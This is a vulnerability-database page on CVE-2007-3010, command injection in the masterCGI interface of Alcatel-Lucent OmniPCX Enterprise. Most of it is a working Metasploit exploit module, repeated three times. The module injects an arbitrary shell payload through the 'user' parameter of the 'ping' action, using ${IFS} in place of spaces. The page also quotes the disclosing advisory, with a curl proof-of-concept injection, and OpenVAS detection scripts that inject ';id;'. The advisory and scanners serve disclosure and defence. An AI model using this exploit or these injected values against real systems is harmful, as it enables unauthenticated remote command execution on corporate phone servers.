Search...

Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution

2010-10-05T00:00:00

ID EDB-ID:16857
Type exploitdb
Reporter metasploit
Modified 2010-10-05T00:00:00

Description

Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution. CVE-2007-3010. Webapps exploit for cgi platform

                                        
                                            ##
# $Id: alcatel_omnipcx_mastercgi_exec.rb 10556 2010-10-05 23:13:04Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 &lt; Msf::Exploit::Remote
	Rank = ManualRanking # Only interactive single commands supported

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           =&gt; 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',
			'Description'    =&gt; %q{
					This module abuses a metacharacter injection vulnerability in the
				HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise
				Communication Server 7.1 and earlier. The Unified Maintenance Tool
				contains a 'masterCGI' binary which allows an unauthenticated attacker
				to execute arbitrary commands by specifing shell metacharaters as the
				'user' within the 'ping' action to obtain 'httpd' user access. This
				module only supports command line payloads, as the httpd process kills
				the reverse/bind shell spawn after the HTTP 200 OK response.
			},
			'Author'         =&gt; [ 'patrick' ],
			'License'        =&gt; MSF_LICENSE,
			'Version'        =&gt; '$Revision: 10556 $',
			'References'     =&gt;
				[
					[ 'OSVDB', '40521' ],
					[ 'BID', '25694' ],
					[ 'CVE', '2007-3010' ],
					[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],
				],
			'Platform'       =&gt; ['unix'],
			'Arch'           =&gt; ARCH_CMD,
			'Privileged'     =&gt; false,
			'Payload'        =&gt;
				{
					'Space'       =&gt; 1024,
					'DisableNops' =&gt; true,
					'Compat'      =&gt;
						{
							'PayloadType' =&gt; 'cmd',
							'RequiredCmd' =&gt; 'generic'
						}
				},
			'Targets'        =&gt;
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' =&gt; 0,
			'DisclosureDate' =&gt; 'Sep 09 2007'))

		register_options(
			[
				Opt::RPORT(443),
				OptBool.new('SSL', [true, 'Use SSL', true]),
			], self.class)
	end

	def exploit
		connect

		cmd = payload.encoded.gsub(" ", '${IFS}')
		req =
			"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" +
			"Host: #{rhost}\r\n\r\n"

		print_status("Sending GET request with command line payload...")
		sock.put(req)

		res = sock.get(3,3)

		if (res =~ /&lt;h5&gt;(.*)&lt;\/h5&gt;/smi)
			out = $1
			print_line(out.gsub(/&lt;h5&gt;|&lt;\/h5&gt;/, ''))
			return
		end

		handler
		disconnect
	end

end

JSON Vulners Source

Initial Source

{"id": "EDB-ID:16857", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution", "description": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution. CVE-2007-3010. Webapps exploit for cgi platform", "published": "2010-10-05T00:00:00", "modified": "2010-10-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16857/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2007-3010"], "lastseen": "2016-02-02T06:40:48", "viewCount": 13, "enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2016-02-02T06:40:48", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3010"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/ALCATEL_OMNIPCX_MASTERCGI_EXEC"]}, {"type": "exploitdb", "idList": ["EDB-ID:30591", "EDB-ID:10031"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8163", "SECURITYVULNS:DOC:18015"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:59383", "PACKETSTORM:82234"]}, {"type": "openvas", "idList": ["OPENVAS:103480", "OPENVAS:1361412562310103480"]}], "modified": "2016-02-02T06:40:48", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://www.exploit-db.com/download/16857/", "sourceData": "##\r\n# $Id: alcatel_omnipcx_mastercgi_exec.rb 10556 2010-10-05 23:13:04Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ManualRanking # Only interactive single commands supported\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\r\n\t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\r\n\t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\r\n\t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\r\n\t\t\t\tto execute arbitrary commands by specifing shell metacharaters as the\r\n\t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. This\r\n\t\t\t\tmodule only supports command line payloads, as the httpd process kills\r\n\t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10556 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '40521' ],\r\n\t\t\t\t\t[ 'BID', '25694' ],\r\n\t\t\t\t\t[ 'CVE', '2007-3010' ],\r\n\t\t\t\t\t[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['unix'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Target', { }]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Sep 09 2007'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(443),\r\n\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tcmd = payload.encoded.gsub(\" \", '${IFS}')\r\n\t\treq =\r\n\t\t\t\"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host: #{rhost}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Sending GET request with command line payload...\")\r\n\t\tsock.put(req)\r\n\r\n\t\tres = sock.get(3,3)\r\n\r\n\t\tif (res =~ /<h5>(.*)<\\/h5>/smi)\r\n\t\t\tout = $1\r\n\t\t\tprint_line(out.gsub(/<h5>|<\\/h5>/, ''))\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["40521"]}

{"cve": [{"lastseen": "2020-10-03T11:45:51", "description": "masterCGI in the Unified Maintenance Tool in Alcatel OmniPCX Enterprise Communication Server R7.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the user parameter during a ping action.", "edition": 3, "cvss3": {}, "published": "2007-09-18T21:17:00", "title": "CVE-2007-3010", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3010"], "modified": "2018-10-16T16:46:00", "cpe": ["cpe:/a:alcatel-lucent:omnipcx:7.1"], "id": "CVE-2007-3010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3010", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:27", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82234", "href": "https://packetstormsecurity.com/files/82234/Alcatel-Lucent-OmniPCX-Enterprise-masterCGI-Arbitrary-Command-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution', \n'Description' => %q{ \nThis module abuses a metacharacter injection vulnerability in the \nHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise \nCommunication Server 7.1 and earlier. The Unified Maintenance Tool \ncontains a 'masterCGI' binary which allows an unauthenticated attacker \nto execute arbitrary commands by specifing shell metacharaters as the \n'user' within the 'ping' action to obtain 'httpd' user access. This \nmodule only supports command line payloads, as the httpd process kills \nthe reverse/bind shell spawn after the HTTP 200 OK response. \n}, \n'Author' => [ 'patrick' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'OSVDB', '40521' ], \n[ 'BID', '25694' ], \n[ 'CVE', '2007-3010' ], \n[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ], \n], \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic' \n} \n}, \n'Targets' => \n[ \n[ 'Automatic Target', { }] \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \n], self.class) \nend \n \ndef exploit \nconnect \n \ncmd = payload.encoded.gsub(\" \", '${IFS}') \nreq = \n\"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\\r\\n\" + \n\"Host: #{rhost}\\r\\n\\r\\n\" \n \nprint_status(\"Sending GET request with command line payload...\") \nsock.put(req) \n \nres = sock.get(3,3) \n \nif (res =~ /<h5>(.*)<\\/h5>/smi) \nout = $1 \nprint_line(out.gsub(/<h5>|<\\/h5>/, '')) \nreturn \nend \n \nhandler \ndisconnect \nend \n \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82234/alcatel_omnipcx_mastercgi_exec.rb.txt"}, {"lastseen": "2016-12-05T22:20:19", "description": "", "published": "2007-09-18T00:00:00", "type": "packetstorm", "title": "rt-sa-2007-001.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2007-09-18T00:00:00", "id": "PACKETSTORM:59383", "href": "https://packetstormsecurity.com/files/59383/rt-sa-2007-001.txt.html", "sourceData": "`Advisory: Alcatel-Lucent OmniPCX Remote Command Execution \n \nRedTeam Pentesting discovered a remote command execution in the \nAlcatel-Lucent OmniPCX during a penetration test. The masterCGI script \nof the OmniPXC integrated communication solution web interface is \nvulnerable to a remote command execution. Attackers can run arbitrary \ncommands with the permissions of the web application user. \n \n \nDetails \n======= \n \nProduct: Alcatel-Lucent OmniPCX \nAffected Versions: All versions up to and including R7.1 \nFixed Versions: All supported versions \nVulnerability Type: Remote Command Execution \nSecurity-Risk: high \nVendor-URL: http://www1.alcatel-lucent.com/psirt/statements.htm \nreference number 2007002 \nVendor-Status: Informed, patch available \nAdvisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php \nAdvisory-Status: public \nCVE: CVE-2007-3010 \nCVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3010 \n \n \nIntroduction \n============ \n \n\"The OmniPCX Enterprise is an integrated communications solution for \nmedium-sized businesses and large corporations. It combines the best of \nthe old (legacy TDM phone connectivity) with the new (a native IP \nplatform and support for Session Initiation Protocol, or SIP) to provide \nan effective and complete communications solution for cost-conscious \ncompanies on the cutting edge.\" \n \n(from the vendor's homepage) \n \n \nMore Details \n============ \n \nThe OmniPCX web interface has a CGI script \"masterCGI\" which offers a \n\"ping\" functionality. By running the script with the parameters \"ping\" \nand \"user\", one is able to ping any IP address reachable from the server \nthe webinterface is running on. \n \ncurl -k \"https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=127.0.0.1\" \n \nThe ping will be done on the server, running the ping program installed \non it. The vulnerability lies in the \"user\" variable not being filtered \nwhen passed to the shell. Thus, arbitrary commands can be executed on \nthe server by adding them to the user variable, separated by semicolons. \nSpaces have to be encoded by using the internal field separator ${IFS}, \nas any normal or URL encoded space will abort the command execution. \n \n \nProof of Concept \n================ \n \ncurl -k \"https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\\${IFS}-l;\" \n \n \nWorkaround \n========== \n \nDeactivate the Web server at the loss of some functionality not related \nto telephony service. Interpose a firewall allowing access to the web \ninterface of the OXE to IP addresses who should have access to the \nserver (e.g. maintenance technicians). \n \n \nFix \n=== \n \nCorrect filtering of shell meta-characters and tighter access control \nhave been implemented in all supported versions. \n \n \nSecurity Risk \n============= \n \nThe risk of this vulnerability is high. Any user which has access to the \nweb interface of the OmniPCX Enterprise solution will be able to execute \narbitrary commands on the server with the permissions of the webserver. \n \n \nHistory \n======= \n \n2007-05-07 First contact with head of technical staff of Alcatel-Lucent. \nWill relay the information to their technicians and call back \nwith further information. \n2007-05-09 Response with a pointer to the Alcatel-Lucent PSIRT and the \nwebsite http://www1.alcatel-lucent.com/psirt, where the \nprocess of reporting a security vulnerability is explained. \nThe advisory gets mailed to the email address provided there. \n2007-05-10 Advisory gets acknowledged by the PSIRT \n2007-05-23 Vulnerability gets confirmed by Alcatel-Lucent \n2007-06-18 CVE number assigned \n2007-09-17 Coordinated public release with Alcatel-Lucent \n \n \nReferences \n========== \n \nhttp://www1.alcatel-lucent.com/psirt/statements.htm \nreference number 2007002 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting is offering individual penetration tests, short \npentests, performed by a team of specialised IT-security experts. \nHereby, security weaknesses in company networks or products are \nuncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttp://www.redteam-pentesting.de. \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 963-1300 \nDennewartstr. 25-27 Fax : +49 241 963-1304 \n52068 Aachen http://www.redteam-pentesting.de/ \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/59383/rt-sa-2007-001.txt"}], "openvas": [{"lastseen": "2018-02-06T13:07:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3010"], "description": "Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.\n\nAttackers can exploit this issue to execute arbitrary commands with\nthe privileges of the 'httpd' user. Successful attacks may facilitate\na compromise of the application and underlying webserver; other\nattacks are also possible.\n\nAlcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are\nvulnerable to this issue.", "modified": "2018-02-05T00:00:00", "published": "2012-04-26T00:00:00", "id": "OPENVAS:103480", "href": "http://plugins.openvas.org/nasl.php?oid=103480", "type": "openvas", "title": "Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_lucent_omnipcx_25694.nasl 8654 2018-02-05 08:19:22Z cfischer $\n#\n# Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.\n\nAttackers can exploit this issue to execute arbitrary commands with\nthe privileges of the 'httpd' user. Successful attacks may facilitate\na compromise of the application and underlying webserver; other\nattacks are also possible.\n\nAlcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are\nvulnerable to this issue.\";\n\ntag_solution = \"The vendor has released an advisory along with fixes to address this\nissue. Please see the referenced advisory for information on\nobtaining fixes.\";\n\nif (description)\n{\n script_id(103480);\n script_bugtraq_id(25694);\n script_cve_id(\"CVE-2007-3010\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version (\"$Revision: 8654 $\");\n\n script_name(\"Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/25694\");\n script_xref(name : \"URL\" , value : \"http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/479699\");\n script_xref(name : \"URL\" , value : \"http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 09:19:22 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 13:55:46 +0200 (Thu, 26 Apr 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n \nport = get_http_port(default:80);\n\nurl = \"/index.html\"; \nbuf = http_get_cache(port:port, item:url);\n\nif(\"<title>OmniPCX\" >< buf) {\n\n url = '/cgi-bin/masterCGI?ping=nomip&user=;id;';\n\n if(http_vuln_check(port:port, url:url,pattern:\"uid=[0-9]+.*gid=[0-9]+.*\",check_header:TRUE)) {\n security_message(port:port);\n exit(0);\n } else {\n exit(99);\n } \n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-08T11:04:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3010"], "description": "Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.", "modified": "2020-05-05T00:00:00", "published": "2012-04-26T00:00:00", "id": "OPENVAS:1361412562310103480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103480", "type": "openvas", "title": "Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103480\");\n script_bugtraq_id(25694);\n script_cve_id(\"CVE-2007-3010\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-05-05T09:44:01+0000\");\n\n script_name(\"Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/25694\");\n script_xref(name:\"URL\", value:\"http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/479699\");\n script_xref(name:\"URL\", value:\"http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 13:55:46 +0200 (Thu, 26 Apr 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"solution\", value:\"The vendor has released an advisory along with fixes to address this\nissue. Please see the referenced advisory for information on\nobtaining fixes.\");\n script_tag(name:\"summary\", value:\"Alcatel-Lucent OmniPCX Enterprise is prone to a remote command-\nexecution vulnerability because it fails to adequately sanitize user-\nsupplied data.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to execute arbitrary commands with\nthe privileges of the 'httpd' user. Successful attacks may facilitate\na compromise of the application and underlying webserver, other\nattacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Alcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are\nvulnerable to this issue.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\n\nurl = \"/index.html\";\nbuf = http_get_cache(port:port, item:url);\n\nif(\"<title>OmniPCX\" >< buf) {\n\n url = '/cgi-bin/masterCGI?ping=nomip&user=;id;';\n\n if(http_vuln_check(port:port, url:url,pattern:\"uid=[0-9]+.*gid=[0-9]+.*\",check_header:TRUE)) {\n security_message(port:port);\n exit(0);\n } else {\n exit(99);\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T11:46:25", "description": "Alcatel-Lucent OmniPCX Enterprise Communication Server. CVE-2007-3010. Webapps exploit for cgi platform", "published": "2007-09-17T00:00:00", "type": "exploitdb", "title": "Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-3010"], "modified": "2007-09-17T00:00:00", "id": "EDB-ID:10031", "href": "https://www.exploit-db.com/exploits/10031/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\r\n\t\t\t\tHTTP management interface of the Alcatel-Lucent OmniPCX Enterprise\r\n\t\t\t\tCommunication Server 7.1 and earlier. The Unified Maintenance Tool\r\n\t\t\t\tcontains a 'masterCGI' binary which allows an unauthenticated attacker\r\n\t\t\t\tto execute arbitrary commands by specifing shell metacharaters as the\r\n\t\t\t\t'user' within the 'ping' action to obtain 'httpd' user access. This\r\n\t\t\t\tmodule only supports command line payloads, as the httpd process kills\r\n\t\t\t\tthe reverse/bind shell spawn after the HTTP 200 OK response.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'patrick' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '40521' ],\r\n\t\t\t\t\t[ 'BID', '25694' ],\r\n\t\t\t\t\t[ 'CVE', '2007-3010' ],\r\n\t\t\t\t\t[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['unix'],\r\n\t\t\t'Arch' => ARCH_CMD,\t\t\t\t\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Target', { }]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(443),\r\n\t\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tcmd = payload.encoded.gsub(\" \", '${IFS}')\r\n\t\treq = \r\n\t\t\t\"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host: #{rhost}\\r\\n\\r\\n\"\r\n\t\t\r\n\t\tprint_status(\"Sending GET request with command line payload...\")\r\n\t\tsock.put(req)\r\n\r\n\t\tres = sock.get(3,3)\r\n\r\n\t\tif (res =~ /<h5>(.*)<\\/h5>/smi)\r\n\t\t\tout = $1\r\n\t\t\tprint_line(out.gsub(/<h5>|<\\/h5>/, ''))\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 